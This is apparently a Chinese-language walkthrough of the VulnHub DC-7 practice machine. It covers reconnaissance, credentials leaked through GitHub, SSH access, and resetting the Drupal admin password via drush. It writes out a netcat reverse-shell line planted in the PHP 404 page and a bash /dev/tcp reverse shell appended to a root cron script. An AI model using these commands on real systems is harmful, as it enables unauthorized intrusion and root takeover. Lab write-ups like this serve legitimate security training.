0x00 环境搭建
靶机地址:http://www.vulnhub.com/entry/dc-7,356/
下载之后用vmware打开即可,使用桥接模式。
开机后搭建完成:
本关只有一个flag,并提示了暴力破解不会成功。
0x01 主机端口探测
用arp-scan -l
探测内网存活主机,再用nmap -sV -p- ip
来探测端口:
发现开启了80端口(HTTP服务)和22端口(SSH服务)
0x02 web渗透
访问80端口,发现是一个 Drupal 搭建的站:
目录扫描和 xray 扫了一下没发现什么利用点,查找CMS通杀漏洞,发现存在RCE,测试后也无法利用。
发现页面提示开发者是@DC7USER
:
查找相关信息发现 github 仓库:
在配置文件中发现数据库的账户密码:
0x03 SSH远程登录
用刚才的数据库账户密码发现可以SSH登录:
查看当前目录下的 mbox 文件,像是计划任务的执行日志记录,每15分钟执行一次backup.sh
:
查看这个脚本文件,发现该系统安装了drupal
管理工具drush
,并得到gpg
加密密码:PickYourOwnPassword
解密文件: gpg -d website.tar.gz.gpg > website.tar.gz
,在setting.php
文件中发现数据库信息(别问,问就是之前那个数据库密码只能连ssh不能登录数据库):
连接数据库,找到用户名密码:
解密失败,用drush
命令修改用户密码:drush user-password admin --password="hacker"
成功登录后台:
0x04 反弹shell
找到上传点,无法直接上传shell:
查询后得知需要加载php模块:
安装成功,勾选上:
修改404页面:<?php system("nc 192.168.1.143 4444 -e /bin/bash");?>
攻击机监听得到反弹shell:
0x05 提权
修改备份脚本写入计划任务:echo "bash -i >& /dev/tcp/10.10.10.244/4444 0>&1" >> /opt/scripts/backups.sh
等待root执行计划任务,获得shell:
总结
主机发现 => 端口扫描 => 访问web服务 => gihub源码泄露 => ssh远程登录 => 发现数据库信息 => 得知用户名 => 修改用户密码 => 登录web页面 => 修改页面源码反弹shell => 找到flag
再次体现了信息泄露的危害和信息收集的重要性